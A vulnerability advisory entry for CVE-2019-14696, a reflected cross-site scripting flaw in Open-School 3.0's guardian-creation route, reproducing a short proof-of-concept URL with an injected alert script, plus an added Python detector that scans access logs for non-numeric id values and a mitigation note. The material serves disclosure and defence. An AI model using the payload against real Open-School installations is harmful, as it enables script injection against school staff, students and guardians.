Open-School Cross-Site Scripting Vulnerability

Vulnerability ID: 1693655    Vulnerability type: Cross-site scripting
Published: 2019-08-09    Updated: 2019-08-14
CVE ID: CVE-2019-14696    CNNVD-ID: CNNVD-201908-416
Affected platform: N/A    CVSS score: N/A
|Vulnerability Source
https://cxsecurity.com/issue/WLB-2019080031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201908-416
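|Vulnerability Details
Open-School is a web-based school management application that provides online fee payment, attendance tracking, an online library and other functions. Open-School Community Edition is the community edition of Open-School. A cross-site scripting vulnerability exists in Open-School 3.0 and Community Edition 2.3. The vulnerability stems from the web application's lack of proper validation of client-supplied data. An attacker can exploit it to execute client-side code.
|Vulnerability EXP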
# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>
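
For defenders reviewing web server logs, the following added example (not part of the advisory or of Open-School's code) flags requests to the route named above whose `id` parameter is not a plain integer. It assumes combined-format access logs and that legitimate `id` values are numeric; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ROUTE = "students/guardians/create"  # route named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id(line):
    """Return the decoded id if the request targets ROUTE with an id that
    is not all digits (an empty id counts); otherwise return None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if ROUTE not in (fully_unquote(r) for r in query.get("r", [])):
        return None
    for raw in query.get("id", []):
        value = fully_unquote(raw)
        # Assumption: a legitimate id is a plain integer.
        if not re.fullmatch(r"\d+", value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_id) for every flagged log line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_id(line)) is not None]

# Constructed sample log lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Aug/2019:10:00:01 +0000] "GET /index.php?r=students/guardians/create&id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Aug/2019:10:00:07 +0000] "GET /index.php?r=students/guardians/create&id=1%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5188',
    '203.0.113.9 - - [06/Aug/2019:10:00:09 +0000] "GET /index.php?r=students%2Fguardians%2Fcreate&id=1%253Cb%253E HTTP/1.1" 200 5150',
    '203.0.113.7 - - [06/Aug/2019:10:00:12 +0000] "GET /index.php?r=site/index&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric id {value!r}")
```

The same integer check, applied server-side before the value reaches the page together with HTML-encoding on output, is the corresponding mitigation for the missing validation described in the details section.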
|References

Source: pastebin.com

Link: https://pastebin.com/AgxqdbAQ


Source: open-school.org

Link: https://open-school.org


Source: nvd.nist.gov

Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14696